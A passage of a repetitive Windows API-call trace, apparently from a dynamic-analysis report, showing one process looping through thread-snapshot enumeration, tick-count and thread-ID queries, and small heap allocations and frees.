returned 0x675190 [0235.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.152] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.153] GetTickCount () returned 0x1140d88 [0235.153] GetCurrentThreadId () returned 0x5b4 [0235.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.153] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.154] GetTickCount () returned 0x1140d88 [0235.154] GetCurrentThreadId () returned 0x5b4 [0235.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.154] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.155] GetTickCount () returned 0x1140d88 [0235.155] GetCurrentThreadId () returned 0x5b4 [0235.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.155] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.156] GetTickCount () returned 0x1140d88 [0235.156] GetCurrentThreadId () returned 0x5b4 [0235.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.156] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.157] GetTickCount () returned 0x1140d88 [0235.157] GetCurrentThreadId () returned 0x5b4 [0235.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.157] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.158] GetTickCount () returned 0x1140d88 [0235.158] GetCurrentThreadId () returned 0x5b4 [0235.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.158] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.159] GetTickCount () returned 0x1140d88 [0235.159] GetCurrentThreadId () returned 0x5b4 [0235.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.159] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.160] GetTickCount () returned 0x1140d88 [0235.160] GetCurrentThreadId () returned 0x5b4 [0235.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.160] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.161] GetTickCount () returned 0x1140d88 [0235.161] GetCurrentThreadId () returned 0x5b4 [0235.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.161] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.162] GetTickCount () returned 0x1140d88 [0235.162] GetCurrentThreadId () returned 0x5b4 [0235.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.162] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.163] GetTickCount () returned 0x1140d98 [0235.163] GetCurrentThreadId () returned 0x5b4 [0235.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.163] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.164] GetTickCount () returned 0x1140d98 [0235.164] GetCurrentThreadId () returned 0x5b4 [0235.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.164] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.165] GetTickCount () returned 0x1140d98 [0235.165] GetCurrentThreadId () returned 0x5b4 [0235.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.165] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.166] GetTickCount () returned 0x1140d98 [0235.166] GetCurrentThreadId () returned 0x5b4 [0235.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.166] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.167] GetTickCount () returned 0x1140d98 [0235.167] GetCurrentThreadId () returned 0x5b4 [0235.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.167] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.168] GetTickCount () returned 0x1140d98 [0235.168] GetCurrentThreadId () returned 0x5b4 [0235.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.168] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.169] GetTickCount () returned 0x1140d98 [0235.169] GetCurrentThreadId () returned 0x5b4 [0235.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.169] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.170] GetTickCount () returned 0x1140d98 [0235.170] GetCurrentThreadId () returned 0x5b4 [0235.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.170] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.171] GetTickCount () returned 0x1140d98 [0235.171] GetCurrentThreadId () returned 0x5b4 [0235.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.171] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.172] GetTickCount () returned 0x1140d98 [0235.172] GetCurrentThreadId () returned 0x5b4 [0235.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.172] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.173] GetTickCount () returned 0x1140d98 [0235.173] GetCurrentThreadId () returned 0x5b4 [0235.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.173] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.174] GetTickCount () returned 0x1140d98 [0235.174] GetCurrentThreadId () returned 0x5b4 [0235.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.174] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.175] GetTickCount () returned 0x1140d98 [0235.175] GetCurrentThreadId () returned 0x5b4 [0235.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.175] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.176] GetTickCount () returned 0x1140d98 [0235.176] GetCurrentThreadId () returned 0x5b4 [0235.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.176] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.177] GetTickCount () returned 0x1140d98 [0235.177] GetCurrentThreadId () returned 0x5b4 [0235.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.177] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.178] GetTickCount () returned 0x1140da8 [0235.178] GetCurrentThreadId () returned 0x5b4 [0235.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.179] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.179] GetTickCount () returned 0x1140da8 [0235.179] GetCurrentThreadId () returned 0x5b4 [0235.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.180] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.180] GetTickCount () returned 0x1140da8 [0235.180] GetCurrentThreadId () returned 0x5b4 [0235.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.181] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.181] GetTickCount () returned 0x1140da8 [0235.181] GetCurrentThreadId () returned 0x5b4 [0235.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.182] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.182] GetTickCount () returned 0x1140da8 [0235.182] GetCurrentThreadId () returned 0x5b4 [0235.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.183] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.183] GetTickCount () returned 0x1140da8 [0235.183] GetCurrentThreadId () returned 0x5b4 [0235.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.184] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.184] GetTickCount () returned 0x1140da8 [0235.184] GetCurrentThreadId () returned 0x5b4 [0235.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.185] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.185] GetTickCount () returned 0x1140da8 [0235.185] GetCurrentThreadId () returned 0x5b4 [0235.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.186] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.186] GetTickCount () returned 0x1140da8 [0235.186] GetCurrentThreadId () returned 0x5b4 [0235.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.186] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.187] GetTickCount () returned 0x1140da8 [0235.187] GetCurrentThreadId () returned 0x5b4 [0235.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.187] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.188] GetTickCount () returned 0x1140da8 [0235.188] GetCurrentThreadId () returned 0x5b4 [0235.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.188] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.189] GetTickCount () returned 0x1140da8 [0235.189] GetCurrentThreadId () returned 0x5b4 [0235.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.189] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.190] GetTickCount () returned 0x1140da8 [0235.190] GetCurrentThreadId () returned 0x5b4 [0235.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.190] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.191] GetTickCount () returned 0x1140da8 [0235.191] GetCurrentThreadId () returned 0x5b4 [0235.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.191] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.192] GetTickCount () returned 0x1140da8 [0235.192] GetCurrentThreadId () returned 0x5b4 [0235.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.192] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.193] GetTickCount () returned 0x1140da8 [0235.193] GetCurrentThreadId () returned 0x5b4 [0235.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.193] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.194] GetTickCount () returned 0x1140db7 [0235.194] GetCurrentThreadId () returned 0x5b4 [0235.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.194] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.195] GetTickCount () returned 0x1140db7 [0235.195] GetCurrentThreadId () returned 0x5b4 [0235.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.195] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.196] GetTickCount () returned 0x1140db7 [0235.196] GetCurrentThreadId () returned 0x5b4 [0235.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.196] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.197] GetTickCount () returned 0x1140db7 [0235.197] GetCurrentThreadId () returned 0x5b4 [0235.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.197] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.198] GetTickCount () returned 0x1140db7 [0235.198] GetCurrentThreadId () returned 0x5b4 [0235.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.198] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.199] GetTickCount () returned 0x1140db7 [0235.199] GetCurrentThreadId () returned 0x5b4 [0235.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.199] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.199] GetTickCount () returned 0x1140db7 [0235.200] GetCurrentThreadId () returned 0x5b4 [0235.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.200] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.200] GetTickCount () returned 0x1140db7 [0235.200] GetCurrentThreadId () returned 0x5b4 [0235.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.201] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.201] GetTickCount () returned 0x1140db7 [0235.201] GetCurrentThreadId () returned 0x5b4 [0235.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.201] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.202] GetTickCount () returned 0x1140db7 [0235.202] GetCurrentThreadId () returned 0x5b4 [0235.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.202] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.203] GetTickCount () returned 0x1140db7 [0235.203] GetCurrentThreadId () returned 0x5b4 [0235.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.203] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.204] GetTickCount () returned 0x1140db7 [0235.204] GetCurrentThreadId () returned 0x5b4 [0235.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.204] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.205] GetTickCount () returned 0x1140db7 [0235.205] GetCurrentThreadId () returned 0x5b4 [0235.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.205] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.206] GetTickCount () returned 0x1140db7 [0235.206] GetCurrentThreadId () returned 0x5b4 [0235.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.206] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.207] GetTickCount () returned 0x1140db7 [0235.207] GetCurrentThreadId () returned 0x5b4 [0235.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.207] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.208] GetTickCount () returned 0x1140db7 [0235.208] GetCurrentThreadId () returned 0x5b4 [0235.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.208] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.209] GetTickCount () returned 0x1140db7 [0235.209] GetCurrentThreadId () returned 0x5b4 [0235.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.209] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.210] GetTickCount () returned 0x1140dc7 [0235.210] GetCurrentThreadId () returned 0x5b4 [0235.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.210] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.210] GetTickCount () returned 0x1140dc7 [0235.211] GetCurrentThreadId () returned 0x5b4 [0235.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.211] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.211] GetTickCount () returned 0x1140dc7 [0235.211] GetCurrentThreadId () returned 0x5b4 [0235.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.212] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.212] GetTickCount () returned 0x1140dc7 [0235.212] GetCurrentThreadId () returned 0x5b4 [0235.212] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.212] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.213] GetTickCount () returned 0x1140dc7 [0235.213] GetCurrentThreadId () returned 0x5b4 [0235.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.213] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.214] GetTickCount () returned 0x1140dc7 [0235.214] GetCurrentThreadId () returned 0x5b4 [0235.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.214] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.215] GetTickCount () returned 0x1140dc7 [0235.215] GetCurrentThreadId () returned 0x5b4 [0235.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.215] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.216] GetTickCount () returned 0x1140dc7 [0235.216] GetCurrentThreadId () returned 0x5b4 [0235.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.216] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.217] GetTickCount () returned 0x1140dc7 [0235.217] GetCurrentThreadId () returned 0x5b4 [0235.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.217] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.218] GetTickCount () returned 0x1140dc7 [0235.218] GetCurrentThreadId () returned 0x5b4 [0235.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.218] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.229] GetTickCount () returned 0x1140dd6 [0235.229] GetCurrentThreadId () returned 0x5b4 [0235.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.230] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.230] GetTickCount () returned 0x1140dd6 [0235.230] GetCurrentThreadId () returned 0x5b4 [0235.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.231] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.231] GetTickCount () returned 0x1140dd6 [0235.231] GetCurrentThreadId () returned 0x5b4 [0235.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.232] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.232] GetTickCount () returned 0x1140dd6 [0235.232] GetCurrentThreadId () returned 0x5b4 [0235.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.233] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.233] GetTickCount () returned 0x1140dd6 [0235.233] GetCurrentThreadId () returned 0x5b4 [0235.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.233] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.234] GetTickCount () returned 0x1140dd6 [0235.234] GetCurrentThreadId () returned 0x5b4 [0235.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.234] HeapFree (in: hHeap=0x620000, 